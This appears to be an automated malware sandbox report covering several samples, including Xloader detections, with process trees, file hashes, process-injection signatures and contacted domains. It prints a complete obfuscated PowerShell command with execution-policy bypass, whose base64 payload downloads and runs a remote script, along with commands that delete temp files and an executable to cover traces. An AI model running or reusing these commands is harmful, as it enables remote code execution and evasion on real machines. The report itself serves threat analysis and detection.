cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.kabeltex.nl | udp |
| N/A | 82.151.33.2:8080 | speedtest.kabeltex.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline
| MD5 | a23aa39741b00f368bac9a2e2574da1d |
| SHA1 | 0d9ccc252132f44c6142e39fe0dc6b52c15abc44 |
| SHA256 | 9d9a152411fb30e8378df7825d3ca80410b2bba7a43f53f68a3888bac40bd56b |
| SHA512 | 32e0066ff846734e5769fcb4e7eda120c856d9062a76481b777f798a905c2d0af6e68301e77845373187e3b175558a3b1b76c6c8be060fe2b639ac0856043ba0 |
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP
| MD5 | 14091f6b52cce370db5e39d8806485ca |
| SHA1 | f78f3f25f42eb5a7e6df88ea26cc666bf5dd86ea |
| SHA256 | 87c98d2fce893786ebbbdd4366df6ae0c6d632917aaa4185a380ceb2e49aade9 |
| SHA512 | ac555f9dc08204e1dd11e7dc89fae520a001d840cce8bc45e9f7d17220c9ebbb6c62028050caa5a6e3df6d1ade81fb5666df5c738c71b22d5288579fc1ad0481 |
C:\Users\Admin\AppData\Local\Temp\RES403B.tmp
| MD5 | 0e6b28c99adba2f5312a9e72f20eaa09 |
| SHA1 | 4ea834bc4634e31f4785acafeef8cd04e3177ba7 |
| SHA256 | 3e1654d78e212b09e5ccd0fe3efa6970b2bb0a20b43aa801f76b83387d7f5976 |
| SHA512 | 4da3fc178e4c6c2a97221b134c9e5dc94876ddcf62f148f12596dc0851a904e9319e421b569ab65665ac3a27891a3b269bed7d5272659ad0b57ec7e06110c036 |
C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.dll
| MD5 | 2145a2a46033988b1223403800143e10 |
| SHA1 | b06393b4553692546176cc64bbcfef26d4b6b41a |
| SHA256 | 4d2f654f6c6e49f1f34cff72cc3420df8e38aa5081b512def8e9f58e81f3829d |
| SHA512 | eb3e62dfeff2467e6b2b9199b49362a85e8e09d3546c1290de4814b32d9ec38c486c0a8012626ce779e0e0cb27c401e44081988fb5f53eadad626c0091d5d5bf |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
Analysis: behavioral1
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
122s
Max time network
170s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2024 set thread context of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
56s
Max time network
44s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1860 set thread context of 584 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
14s
Max time network
118s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
debian9-mipsel
Max time kernel
0s
Max time network
25s
Command Line
Signatures
Processes
./53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec
[./53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 5.200.6.34:123 | 2.debian.pool.ntp.org | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
148s
Max time network
193s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1908 set thread context of 672 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 672 set thread context of 1288 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 672 set thread context of 1288 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1032 set thread context of 1288 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.kathyharvey.com | udp |
| N/A | 52.58.78.16:80 | www.kathyharvey.com | tcp |
| N/A | 8.8.8.8:53 | www.panyu-qqbaby.com | udp |
| N/A | 107.160.109.196:80 | www.panyu-qqbaby.com | tcp |
| N/A | 8.8.8.8:53 | www.facebookipl.com | udp |
| N/A | 34.102.136.180:80 | www.facebookipl.com | tcp |
| N/A | 8.8.8.8:53 | www.visualartcr.com | udp |
| N/A | 74.220.199.68:80 | www.visualartcr.com | tcp |
| N/A | 8.8.8.8:53 | www.warrenswindowcleans.co.uk | udp |
| N/A | 85.233.160.22:80 | www.warrenswindowcleans.co.uk | tcp |
| N/A | 8.8.8.8:53 | www.centerevents.net | udp |
| N/A | 8.8.8.8:53 | www.trinspinsgreen.com | udp |
| N/A | 8.8.8.8:53 | www.thefucktardmanual.com | udp |
| N/A | 192.0.78.24:80 | www.thefucktardmanual.com | tcp |
| N/A | 8.8.8.8:53 | www.arodsr.com | udp |
| N/A | 66.235.200.146:80 | www.arodsr.com | tcp |
| N/A | 8.8.8.8:53 | www.tincanphones.com | udp |
| N/A | 3.136.2.34:80 | www.tincanphones.com | tcp |
| N/A | 8.8.8.8:53 | www.regarta.com | udp |
| N/A | 173.239.8.164:80 | www.regarta.com | tcp |
| N/A | 8.8.8.8:53 | www.sdmdwang.com | udp |
| N/A | 112.213.96.11:80 | www.sdmdwang.com | tcp |
| N/A | 8.8.8.8:53 | www.sdmdwang.com | udp |
| N/A | 112.213.96.11:80 | www.sdmdwang.com | tcp |
| N/A | 8.8.8.8:53 | www.experienceddoctor.com | udp |
| N/A | 207.148.248.143:80 | www.experienceddoctor.com | tcp |
Files